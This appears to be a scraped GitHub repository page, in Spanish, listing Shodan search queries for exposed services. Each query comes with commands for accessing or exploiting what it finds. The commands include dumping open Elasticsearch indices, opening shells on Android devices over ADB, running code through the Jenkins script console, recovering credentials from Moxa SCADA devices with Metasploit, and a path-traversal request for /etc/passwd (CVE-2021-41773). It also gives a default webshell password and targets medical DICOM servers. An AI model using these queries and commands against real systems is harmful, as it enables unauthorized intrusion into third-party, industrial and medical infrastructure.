• Stars
    star
    226
  • Rank 176,514 (Top 4 %)
  • Language
    Python
  • Created about 1 year ago
  • Updated about 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Shodan Dorks 2023

Shodan Dorks 2023

Recopilación de Querys de shodan con scripts personalizados :)

DICOM

El estándar DICOM (Digital Imaging and Communications in Medicine) es un estándar utilizado en la industria médica para la gestión, almacenamiento y transmisión de imágenes médicas, como radiografías, tomografías computarizadas (TC), imágenes de resonancia magnética (IRM), entre otras.

"DICOM Server Response" port:104
python3 Dicom.py

1

2

Elasticsearch

Elasticsearch es un motor de búsqueda y análisis distribuido, de código abierto, basado en Lucene. Se utiliza para indexar, buscar y analizar grandes volúmenes de datos en tiempo real. Está diseñado para manejar datos no estructurados o semiestructurados y es especialmente útil para casos de uso en los que se requiere búsqueda y análisis de texto, logística, monitoreo y análisis de registros, y más

port:"9200" elastic: "Total Size:"
curl -X GET "http://192.x.x.153:9200/_cat/indices?v"
curl -X GET "http://192.x.x.153:9200/.monitoring-beats-7-2023.08.30"
curl -X GET "http://192.x.x.153:9200/_search?pretty=true"
python3 elastic.py -t 192.x.x.153

3

Access FTP Anonymous

El acceso FTP anónimo es una forma de conectarse a un servidor FTP sin proporcionar credenciales de autenticación específicas.

"220" "230 Login successful." port:21
230 'anonymous@' login ok 
"Anonymous+access+allowed" port:"21"
shodan search :"220" "230 Login successful." port:21 --fields ip_str --separator " " | awk '{print $1}' | cat > ips.txt
python3 ftp.py -l ips.txt

4

Authentication Disabled SMB

La autenticación SMB (Server Message Block) sin credenciales, también conocida como acceso SMB anónimo, permite a los usuarios acceder a recursos compartidos en una red sin proporcionar nombres de usuario ni contraseñas. Esto puede ser útil para acceder a carpetas compartidas que se han configurado para permitir el acceso anónimo.

"Authentication: disabled" port:445 product:"Samba" 
smbclient -L //200.x.x.29/ -N  
smbclient //200.x.x.29/info

5

Access authentication disabled VNC

Esto significa que el servidor VNC está configurado para permitir conexiones sin requerir autenticación.

"authentication disabled" port:5900,5901
vncviewer -passwd none 91.x.x.238

6

Access authentication disabled MongoDB

Esto significa que el servidor NoSQL MongoDB está configurado para permitir conexiones sin requerir autenticación.

"MongoDB Server Information" port:27017 -authentication
"Set-Cookie: mongo-express=" "200 OK"
mongo --host 139.x.x.5

7

Access Jenkins

Se puede visualizar componentes del servicio Jenkins, ejecutar scripts, etc.

http.component:"jenkins"
title:"Dashboard [Jenkins]"
html:"Dashboard Jenkins"
add /script 
print "uname -a".execute().text

8

Access devices ADB

Es una aplicación de terminal que le permite conectarse al servicio ADB shell de otros dispositivos Android a través de la red.

shodan search :Android Debug Bridge port:5555 "Name:" --fields ip_str --separator " " | awk '{print $1}' | cat > ips.txt 
python3 adb.py   

9

adb devices

10

adb -s 59.x.x.112:5555 shell

11

Access devices SCADA Moxa

Sistema SCADA que utiliza productos de la marca Moxa para establecer la conectividad y la comunicación con los dispositivos industriales que están siendo monitoreados y controlados en una infraestructura crítica o proceso industrial.

"Moxa Nport Device" Status: Authentication enabled port:"4800"
"Moxa Nport Device" Status: Authentication disabled port:"4800"
shodan search --separator , --fields ip_str,port,data "Moxa Nport" | awk '{print $1,$2,$3}' FS=":" | tr '\\', ' ' | awk '{print $1,$7,$8}' | column -t | ccze -A
use auxiliary/admin/scada/moxa_credentials_recovery
set FUNCTION CREDS
set rport 4800
set rhosts 212.x.x.14
run

12

telnet 212.x.x.14

13

Exploit Infrastructure RCE CVE-2020-0796

La vulnerabilidad CVE-2020-0796 se refiere a una vulnerabilidad de ejecución de código remoto (RCE, por sus siglas en inglés) que afecta al protocolo de compartición de archivos SMBv3 (Server Message Block version 3). SMB es un protocolo utilizado para compartir archivos, impresoras y otros recursos en redes de computadoras. La versión 3 (SMBv3) es una versión moderna de este protocolo utilizada en sistemas operativos Windows.

Esta vulnerabilidad se conoció coloquialmente como "SMBGhost" o "CoronaBlue" y fue anunciada en marzo de 2020.

vuln:CVE-2020-0796
country:pe port:445

14

15

Exploit Web RCE CVE-2021-41773

shodan search :apache 2.4.49  --fields ip_str,port --separator " " | awk '{print $1":"$2}' | cat > url.txt

16

curl -k http://210.x.x.7/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 

17

Electronic measure

"Server: EIG Embedded Web Server" "200 Document follows"

18

Search Web shell

html:"wso.php"

19

webshell as default fa769dac7a0a94ee47d8ebe021eaba9e has a match password ghost287

20

Search Backup Files

html:"web.zip"
"web.zip"

21

OS Windows Obsolete

Tener sistemas Windows obsoletos y sin soporte puede conllevar una serie de peligros y riesgos significativos para la seguridad, la estabilidad y la eficiencia de tus sistemas y datos.

os:"Windows 5.0" – Windows 2000; support end 2010.
os:"Windows 5.1" – Windows XP; support end 2014.
os:"Windows 2003" – Windows Server 2003; support end 2015.
os:"Windows Vista"– Windows Vista; support end 2017.
os:"Windows 2008" – Windows Server 2008; support end 2020.
os:"Windows 7" – Windows 7; support end 2020.
os:"Windows 8" – Windows 8; support end 2016.
os:"Windows 2011" – Windows Home Server 2011; support end 2016.
os:"Windows 8.1" – Windows 8.1; support end 2018.
os:"Windows 2012" – Windows Server 2012; support end 2018.